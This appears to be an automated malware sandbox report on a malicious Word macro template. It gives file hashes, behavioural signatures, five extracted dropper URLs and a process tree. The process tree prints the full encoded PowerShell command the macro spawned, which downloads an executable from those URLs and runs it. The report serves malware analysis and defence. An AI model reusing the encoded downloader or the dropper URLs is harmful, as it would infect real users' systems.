Analysis

  • max time kernel
    106s
  • max time network
    41s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 21:59

General

  • Target

    82e1e3df0f694eb0211a9d5291b43356953764557f25bd7b7b1de129b520ed17.dotm

  • Size

    153KB

  • MD5

    d717d96065b8fb5fb93ba5766d96eb34

  • SHA1

    12039b3e2b7e484d70509b1aebc2ee778ad05fc3

  • SHA256

    82e1e3df0f694eb0211a9d5291b43356953764557f25bd7b7b1de129b520ed17

  • SHA512

    8f7514795ade123c0c35375c8f36e843925fcf735a441c1431e897bb4dbf9a28db6bd4dc68c2fcbe1fe735793171c258661d5ed9ec6cdb4fe58d5aa692a4411e

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://think1.com/wp-content/upgrade/2na4-4q5g-751619964/

exe.dropper

http://broadpeakdefense.com/fbsgf/McZcBMeM/

exe.dropper

https://lecairtravels.com/wp-admin/bXwjcdeg/

exe.dropper

https://www.biyunhui.com/fj/wbTKndf/

exe.dropper

http://nautcoins.com/wp-includes/AcZxFxQ/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\82e1e3df0f694eb0211a9d5291b43356953764557f25bd7b7b1de129b520ed17.dotm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1724
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -enco JABJADkARwBRAE4ARgA9ACcAdABMAHcAWABaAHEAegA3ACcAOwAkAE0ANABXADcAaABuACAAPQAgACcAMwA5ADMAJwA7ACQAdABIAHcAMABKAGoASgB0AD0AJwBWAHAAagByAEsAMwAnADsAJABEAHcAagBCAHoAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATQA0AFcANwBoAG4AKwAnAC4AZQB4AGUAJwA7ACQAQwA3ADAAUgB2AEkAbQA9ACcAcABqAEcAYQBpAHoAdAAnADsAJABiAHUAcgBwAHIAcgA0ADAAPQAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAQwBsAGkARQBuAFQAOwAkAG8AdgAwAGYAVwA5AEgAcAA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGsAMQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABnAHIAYQBkAGUALwAyAG4AYQA0AC0ANABxADUAZwAtADcANQAxADYAMQA5ADkANgA0AC8AQABoAHQAdABwADoALwAvAGIAcgBvAGEAZABwAGUAYQBrAGQAZQBmAGUAbgBzAGUALgBjAG8AbQAvAGYAYgBzAGcAZgAvAE0AYwBaAGMAQgBNAGUATQAvAEAAaAB0AHQAcABzADoALwAvAGwAZQBjAGEAaQByAHQAcgBhAHYAZQBsAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGIAWAB3AGoAYwBkAGUAZwAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYgBpAHkAdQBuAGgAdQBpAC4AYwBvAG0ALwBmAGoALwB3AGIAVABLAG4AZABmAC8AQABoAHQAdABwADoALwAvAG4AYQB1AHQAYwBvAGkAbgBzAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBBAGMAWgB4AEYAeABRAC8AJwAuACIAcwBwAGwAYABpAFQAIgAoACcAQAAnACkAOwAkAFUAXwA5AHMARABYAD0AJwBYAGoAUQByAFAAegA0ACcAOwBmAG8AcgBlAGEAYwBoACgAJABIAEoAVgBCADMAdgAgAGkAbgAgACQAbwB2ADAAZgBXADkASABwACkAewB0AHIAeQB7ACQAYgB1AHIAcAByAHIANAAwAC4AIgBEAGAAbwBgAFcAYABOAGwATwBBAEQAZgBJAEwARQAiACgAJABIAEoAVgBCADMAdgAsACAAJABEAHcAagBCAHoAMQApADsAJABwADgAawBYAG4AVwBFAD0AJwBJAEkANAA0ADIAegBGACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQARAB3AGoAQgB6ADEAKQAuACIATABgAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAMgAyADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYABBAFIAdAAiACgAJABEAHcAagBCAHoAMQApADsAJABrAFYANABtAEEAUABxAEcAPQAnAGQAdQBPAEoATQBCAHcAQQAnADsAYgByAGUAYQBrADsAJABqADUAdABzAE0ASQBuAGsAPQAnAGYASQBWADkAawBBADYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASAA4AFEAUABIAHoAYQA9ACcAagAxAEIARgBiAHQAUgB3ACcA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1756

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1724-60-0x000007FEFB851000-0x000007FEFB853000-memory.dmp
      Filesize

      8KB

    • memory/1724-59-0x0000000000000000-mapping.dmp
    • memory/1756-71-0x000000000256B000-0x000000000258A000-memory.dmp
      Filesize

      124KB

    • memory/1756-69-0x000007FEF3190000-0x000007FEF3CED000-memory.dmp
      Filesize

      11.4MB

    • memory/1756-70-0x0000000002564000-0x0000000002567000-memory.dmp
      Filesize

      12KB

    • memory/1756-68-0x000007FEF3E00000-0x000007FEF4823000-memory.dmp
      Filesize

      10.1MB

    • memory/1860-58-0x0000000070DAD000-0x0000000070DB8000-memory.dmp
      Filesize

      44KB

    • memory/1860-61-0x0000000004D9B000-0x0000000004DFF000-memory.dmp
      Filesize

      400KB

    • memory/1860-62-0x0000000004D9B000-0x0000000004DFF000-memory.dmp
      Filesize

      400KB

    • memory/1860-63-0x0000000004D9B000-0x0000000004DFF000-memory.dmp
      Filesize

      400KB

    • memory/1860-65-0x0000000004D9B000-0x0000000004DFF000-memory.dmp
      Filesize

      400KB

    • memory/1860-54-0x0000000072341000-0x0000000072344000-memory.dmp
      Filesize

      12KB

    • memory/1860-57-0x0000000075E41000-0x0000000075E43000-memory.dmp
      Filesize

      8KB

    • memory/1860-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1860-55-0x000000006FDC1000-0x000000006FDC3000-memory.dmp
      Filesize

      8KB

    • memory/1860-72-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB